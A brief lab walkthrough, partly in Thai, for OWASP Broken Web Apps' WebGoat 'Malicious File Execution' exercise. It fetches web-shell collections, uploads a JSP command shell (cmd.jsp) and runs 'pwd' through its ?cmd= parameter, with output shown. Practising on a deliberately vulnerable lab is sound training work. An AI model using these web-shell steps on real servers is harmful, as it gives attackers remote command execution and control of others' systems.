OwaspBWA - Malicious File Execution

Malicious File Execution

ด่านทดสอบนี้เราจะมาลอง Upload .jsp shell เพื่อ Execute command

• Install fuzzdb on ubuntu

svn checkout http://fuzzdb.googlecode.com/svn/trunk/fuzzdb-read-onlycd
git clone https://github.com/tennc/webshell

• upload > cmd.jsp   :

(from : /home/{user}/fuzzdb-read-only/web-backdoors/jsp/cmd.jsp)

• Execute command : !  /WebGoat/uploads/cmd.jsp?cmd=pwd

Output :
Command: pwd
 /var/lib/tomcat6